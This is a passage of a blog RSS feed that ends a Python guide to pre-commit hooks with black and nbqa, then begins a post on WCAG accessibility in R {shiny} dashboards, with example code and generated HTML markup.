&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;- &lt;span style="color:#6e7681"&gt;  &lt;/span&gt;&lt;span style="color:#7ee787"&gt;repo&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;https://github.com/psf/black&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;    &lt;/span&gt;&lt;span style="color:#7ee787"&gt;rev&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;21.&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;7b0&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;    &lt;/span&gt;&lt;span style="color:#7ee787"&gt;hooks&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;    &lt;/span&gt;- &lt;span style="color:#6e7681"&gt;  &lt;/span&gt;&lt;span style="color:#7ee787"&gt;id&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;black&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Once we have created our &lt;code&gt;.pre-commit-config.yaml&lt;/code&gt; file we can then run&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;pre-commit install
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Now, whenever the command &lt;code&gt;git commit&lt;/code&gt; is run, the pre-commit hooks will automatically be applied!&lt;/p&gt;
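&lt;p&gt;To give a feel for the kind of tidying that hooks such as &lt;code&gt;trailing-whitespace&lt;/code&gt; and &lt;code&gt;end-of-file-fixer&lt;/code&gt; perform, here is a rough Python sketch. It is not the hooks&amp;rsquo; actual implementation, and the function name &lt;code&gt;tidy_text&lt;/code&gt; is our own.&lt;/p&gt;

```python
def tidy_text(text):
    """Strip trailing whitespace from each line and end the text with one newline."""
    lines = [line.rstrip() for line in text.splitlines()]
    # Drop blank lines at the end so exactly one final newline remains.
    while lines and not lines[-1]:
        lines.pop()
    return "\n".join(lines) + "\n" if lines else ""


messy = "Captain = 'Picard'   \nprint(Captain)\t\n\n\n"
print(repr(tidy_text(messy)))
```

&lt;p&gt;The real hooks apply this sort of fix to the files staged for commit.&lt;/p&gt;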
&lt;p&gt;It is also possible to add pre-commit hooks for notebooks with nbqa. For example, with the following &lt;code&gt;.pre-commit-config.yaml&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;repos&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;- &lt;span style="color:#7ee787"&gt;repo&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;https://github.com/nbQA-dev/nbQA&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;  &lt;/span&gt;&lt;span style="color:#7ee787"&gt;rev&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1.3.1&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;  &lt;/span&gt;&lt;span style="color:#7ee787"&gt;hooks&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;    &lt;/span&gt;- &lt;span style="color:#7ee787"&gt;id&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;nbqa-black&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;      &lt;/span&gt;&lt;span style="color:#7ee787"&gt;additional_dependencies&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;[&lt;span style="color:#a5d6ff"&gt;black==21.7b0]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;    &lt;/span&gt;- &lt;span style="color:#7ee787"&gt;id&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;nbqa-pylint&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;      &lt;/span&gt;&lt;span style="color:#7ee787"&gt;additional_dependencies&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;[&lt;span style="color:#a5d6ff"&gt;pylint==2.13.4]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you want to use nbqa with a specific version of a tool then you can specify this in the &lt;code&gt;additional_dependencies&lt;/code&gt; field (as above).&lt;/p&gt;
&lt;h2 id="further-reading"&gt;Further reading&lt;/h2&gt;
&lt;p&gt;We hope you found this post useful!&lt;/p&gt;
&lt;p&gt;This is by no means intended as a complete guide. If you wish to explore linters and formatters further, we recommend the following links:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;For more information about how paired notebooks work: &lt;a href="https://jupytext.readthedocs.io/en/latest/paired-notebooks.html" rel="external"&gt;https://jupytext.readthedocs.io/en/latest/paired-notebooks.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;For more advanced usage of pre-commit hooks: &lt;a href="https://pre-commit.com/#advanced" rel="external"&gt;https://pre-commit.com/#advanced&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Some other popular linters include:
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://pycodestyle.pycqa.org/en/latest/" rel="external"&gt;pycodestyle&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://mypy.readthedocs.io/en/stable/index.html" rel="external"&gt;mypy&lt;/a&gt; (static type checker for Python)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://pycqa.github.io/isort/" rel="external"&gt;isort&lt;/a&gt; (for sorting imports consistently)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Another popular auto-formatter is &lt;a href="https://pypi.org/project/autopep8/" rel="external"&gt;autopep8&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/python-linting-guide/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Accessibility in R applications: {shiny}</title><link>https://www.jumpingrivers.com/blog/accessible-shiny-standards-wcag/</link><pubDate>Thu, 19 May 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/accessible-shiny-standards-wcag/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/accessible-shiny-standards-wcag/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/accessible-shiny-standards-wcag/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part two of our two-part series:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: &lt;a href="https://www.jumpingrivers.com/blog/importance-accessibility-standards-shiny-web/" rel="external"&gt;The importance of web accessibility standards&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: &lt;a href="https://www.jumpingrivers.com/blog/accessible-shiny-standards-wcag/" rel="external"&gt;Accessibility in R applications: {shiny}&lt;/a&gt; (this post)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Web applications that are &lt;a href="https://www.w3.org/WAI/standards-guidelines/wcag/" rel="external"&gt;Web Content Accessibility Guidelines
(WCAG)&lt;/a&gt; compliant are
becoming an increasingly prominent part of my role as a data scientist
as the importance of ensuring that data products are available to all
takes a more central focus. This is particularly true in the case of
building solutions for public sector organisations in the UK as they are
under a legal obligation to meet certain accessibility requirements.&lt;/p&gt;
&lt;p&gt;{shiny} has, for some time now, been a leading route that statisticians,
analysts and data scientists might take to provide a web based
application as a graphical user interface to data manipulation,
graphical and statistical tooling that may otherwise only be easily
accessible to R programmers.&lt;/p&gt;
&lt;p&gt;At &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt; we were recently
tasked with taking a prototype product, which we initially helped to
develop in {shiny}, to a public facing production environment for a
public sector client. This blog post highlights some of the thoughts
that arose throughout the scoping stage of that project when assessing
{shiny} as a suitable candidate for the final solution.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-accessible-shiny-standards-wcag"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="accessibility-and-shiny"&gt;Accessibility and {shiny}&lt;/h2&gt;
&lt;h3 id="the-good"&gt;The good&lt;/h3&gt;
&lt;p&gt;The great thing about {shiny} is that it allows data practitioners a
relatively simple, quick approach to providing an intuitive user
interface to their R code via a web application. So effective is {shiny}
at this job that it can be done with little to no traditional web
development knowledge on the part of the developer. {shiny} and
associated packages provide collections of R functions that return HTML,
CSS and JavaScript which is then shipped to a browser. The variety of
packages giving trivial access to styled front end components and
widgets is already large and constantly growing. What this means is that
R programmers can achieve a huge amount in the way of building complex,
visually attractive web applications without needing to care very much
about the underlying generated content that is interpreted by the
browser.&lt;/p&gt;
&lt;p&gt;Need a tidy menu to drive navigation around your application?
{shinydashboard} is a fine choice. If you want an attractive table to
display data, that also facilitates download, sorting, pagination plus
numerous other “bolt-ons” then many R users will point you in the
direction of {DT}. {plotly} has you covered for interactive charts,
again allowing you to do things like download snapshots from your plots
for use elsewhere.&lt;/p&gt;
&lt;p&gt;This sort of technology is absolutely fantastic for prototyping
products. The feedback loop through iteration from initial idea,
manipulation and modelling code, rough design and layout to usable and
deployable application can be phenomenally fast. That is not to say that
shiny is completely inappropriate beyond the prototyping stage, just
that, certainly in my opinion, this is absolutely one of its biggest
strengths.&lt;/p&gt;
&lt;h3 id="the-bad"&gt;The bad&lt;/h3&gt;
&lt;p&gt;If it is good that shiny allows data and statistics experts to create
web applications without any real knowledge of front end technology then
it is almost certainly also bad that shiny allows data and statistics
experts to create web applications without any real knowledge of front
end technology. To my mind, its big strength is also a weakness. Much or
all of the browser interpreted content is generated for you. This is
particularly prominent when considering WCAG compliance.&lt;/p&gt;
&lt;p&gt;Let’s take a look at how some of this problem is manifested:&lt;/p&gt;
&lt;p&gt;Consider the following snippet of code, which I suspect is
representative of a large number of shiny applications given the popularity
of the package.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;shinydashboard&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinydashboardPlus&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; skin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;purple&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; header &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardHeader&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;My App&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sidebar &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardSidebar&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sidebarMenu&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebarMenu&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;menuItem&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Home page&amp;#34;&lt;/span&gt;, tabName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; body &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardBody&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;dashboardBody&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tabItems&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tabItem&lt;/span&gt;(tabName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Dashboard&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Note that I would typically namespace all function calls&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# and encourage others to do the same, however for the&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# purpose of a blog post, loading the packages via `library`&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# may make it a little easier to read on small screen formats.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If we were to start a shiny app in the usual sort of way&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output, session){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# empty server function&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# not important for discussion but necessary&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# to launch an application.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shiny&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;shinyApp&lt;/span&gt;(ui, server)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;this gives the not entirely unattractive UI below (subjective I know).&lt;/p&gt;
&lt;p&gt;&lt;img alt="hello dashboard shiny ui image" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/accessible-shiny-standards-wcag/hello-dashboard.png" width="976"&gt;&lt;/p&gt;
&lt;p&gt;It does so by generating the following markup as the output of the R
code which is shipped off to the browser to be rendered.&lt;/p&gt;
&lt;!-- Warning: the following chunk comes from print(ui). But to
get syntax highlighting, I've hard-coded it. --&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;body&lt;/span&gt; data-scrollToTop&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;0&amp;#34;&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;hold-transition skin-purple&amp;#34;&lt;/span&gt; data-skin&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;purple&amp;#34;&lt;/span&gt; style&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;min-height: 611px;&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;wrapper&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;header&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;main-header&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;span&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;logo&amp;#34;&lt;/span&gt;&amp;gt;My App&amp;lt;/&lt;span style="color:#7ee787"&gt;span&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;nav&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;navbar navbar-static-top&amp;#34;&lt;/span&gt; role&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;navigation&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;span&lt;/span&gt; style&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;display:none;&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;i&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;fa-solid fa-bars&amp;#34;&lt;/span&gt; role&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;presentation&amp;#34;&lt;/span&gt; aria-label&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;bars icon&amp;#34;&lt;/span&gt;&amp;gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;i&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;span&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;a&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;#&amp;#34;&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebar-toggle&amp;#34;&lt;/span&gt; data-toggle&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;offcanvas&amp;#34;&lt;/span&gt; role&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;button&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;span&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sr-only&amp;#34;&lt;/span&gt;&amp;gt;Toggle navigation&amp;lt;/&lt;span style="color:#7ee787"&gt;span&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;a&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;navbar-custom-menu&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;ul&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;nav navbar-nav&amp;#34;&lt;/span&gt;&amp;gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;ul&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;nav&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;header&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;aside&lt;/span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebarCollapsed&amp;#34;&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;main-sidebar&amp;#34;&lt;/span&gt; data-collapsed&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;false&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;section&lt;/span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebarItemExpanded&amp;#34;&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebar&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;ul&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebar-menu&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;li&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;a&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;#shiny-tab-Home&amp;#34;&lt;/span&gt; data-toggle&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;tab&amp;#34;&lt;/span&gt; data-value&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;span&lt;/span&gt;&amp;gt;Home page&amp;lt;/&lt;span style="color:#7ee787"&gt;span&lt;/span&gt;&amp;gt;
